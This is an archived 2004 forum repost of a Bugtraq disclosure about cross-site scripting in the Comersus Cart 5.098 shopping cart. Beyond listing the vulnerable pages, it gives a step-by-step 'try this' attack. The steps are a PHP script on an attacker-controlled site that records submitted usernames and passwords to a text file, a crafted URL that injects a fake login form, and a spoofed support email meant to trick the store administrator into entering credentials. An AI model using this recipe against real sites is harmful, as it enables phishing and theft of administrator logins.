Comersus 5.098 Xss Vulnerable

Full Version: Comersus 5.098 Xss Vulnerable

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Aug 2 2004, 11:21 PM

QUOTE

* Comersus Cart Version 5.098

Comersus is an open source shopping cart.I found a few XSS Vulnerabilty :

Pages Affected:
/comersus/store/comersus_message.asp
/comersus/backofficeLite/comersus_backoffice_message.asp

Examples:

http://www.target.net/comersus/store/comer...ABLE</h4>
http://www.target.net/comersus/backofficel...ABLE</h4>

Try this :

1 Step :

Create a file called comersus.php

<?
$buka = fopen("comersus.txt","a+");
fwrite($buka,"User:".$uid."|"."Password:".$passwd."|");
fclose($buka);
header("Location:http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=Your+authentication+data+is+incorrect...");
exit();
?>

Next Step :

Open url :

http://www.target.net/comersus/backofficel...t;</form>

Enter user and password,then Submit

After that, enter this url:

http://mysite.org/comersus.txt

This is a result(comersus.txt) :

User:az001|Password:passwordnya|

Sent a fake email from Comersus Site(support_at_comersus.com) to www.target.net admin (ex. admin_at_target.net):

Hello admin_at_target.net blablablablabla ...............................................

................................................................

Please Login with username and password here

and Wait until admin execute url

Source: http://seclists.org/lists/bugtraq/2004/Aug/0014.html

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.